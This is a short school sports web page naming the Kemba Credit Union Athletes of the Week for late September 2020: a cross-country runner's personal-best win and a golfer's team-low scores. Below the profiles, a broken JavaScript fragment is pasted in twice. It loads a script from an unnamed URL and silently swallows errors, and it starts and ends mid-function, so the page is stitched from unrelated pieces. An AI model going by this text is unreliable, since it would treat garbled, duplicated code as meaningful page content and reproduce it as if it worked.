Athletes of the Week
Kemba Credit Union Athletes of the Week 9/21/2020-9/27/2020
Cole Cronk
Senior, Cross Country
Cole won the Lakota East Fall Classic at Voice of America Park. Won the race with a personal best time of 15:28.6. It’s the 7th best time recorded in the state of Ohio this season and the second best time recorded in Lakota West history.
Ellie Myers
Junior, Girls Golf
Ellie shot a team low against both Seton (46) and Mercy/McAuley (43).
const loadScriptWithTimeout = (url, timeout) => { return new Promise((resolve, reject) => { const script = document.createElement('script'); script.src = url; script.async = true;
script.onload = () => { clearTimeout(timer); resolve(); };
script.onerror = () => { clearTimeout(timer); reject(); };
const timer = setTimeout(() => { script.remove(); reject(); }, timeout);
document.body.appendChild(script); }); };
await loadScriptWithTimeout(scriptUrl, TIMEOUT_MS); } catch (_) {} })();
const loadScriptWithTimeout = (url, timeout) => { return new Promise((resolve, reject) => { const script = document.createElement('script'); script.src = url; script.async = true;
script.onload = () => { clearTimeout(timer); resolve(); };
script.onerror = () => { clearTimeout(timer); reject(); };
const timer = setTimeout(() => { script.remove(); reject(); }, timeout);
document.body.appendChild(script); }); };
await loadScriptWithTimeout(scriptUrl, TIMEOUT_MS); } catch (_) {} })();